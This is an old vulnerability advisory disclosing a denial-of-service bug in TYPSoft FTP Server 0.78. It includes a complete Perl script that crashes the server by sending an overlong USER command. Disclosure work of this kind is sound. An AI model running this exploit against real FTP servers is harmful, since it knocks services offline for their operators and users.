******************************************* + TYPSoft FTP Server remote DoS Problem + ******************************************* # Advisory by dethy # # www.synnergy.net # |=========================================| Advisory # 12 Vulnerable: TYPSoft FTP Server 0.78 [ although 0.7X are also vulnerable ] Systems : Win9X, WinNT Product : http://www.multimania.com/typsoft/ Discovery : dethy@synnergy.net " Another trivial bug. " Description ----------- TYPSoft FTP is a Freeware FTP server, with all the necessary features to facilitate beginners and advanced users. Vulnerability ------------- TYPSoft FTP Server does not correctly deal with long commands over 2048 bytes [ 2k ]. So by sending a long 'user', 'pass', 'cwd', etc, causing the server to hang and increase system resources. The process will not be active until it is manually restarted. Exploit ------- simple script to send a long 'user' command to the server, resulting in the ftpd crashing. ================================== #!/usr/bin/perl use Getopt::Std; use IO::Socket; getopts('s:', \%args); if(!defined($args{s})){&usage;} $serv = $args{s}; $foo = "A"; $number = 2048; $data .= $foo x $number; $EOL="\015\012"; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "ftp(21)", ) || die("Unable to connect to ftp port at $args{s}\n"); $remote->autoflush(1); print $remote "USER $data". $EOL; while (<$remote>){ print } print("\nCrash was successful !\n"); sub usage {die("\n$0 -s \n\n");} ==================================== Solution -------- The vendor [ typsoft@altern.org ] has been contacted, wait until a patched version comes out or use an alternative product. Disclaimer ---------- Synnergy Networks may not be held liable for the use and/or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk. --------------------------------------------------------------------------------------- Web : http://www.synnergy.net E-Mail : dethy@synnergy.net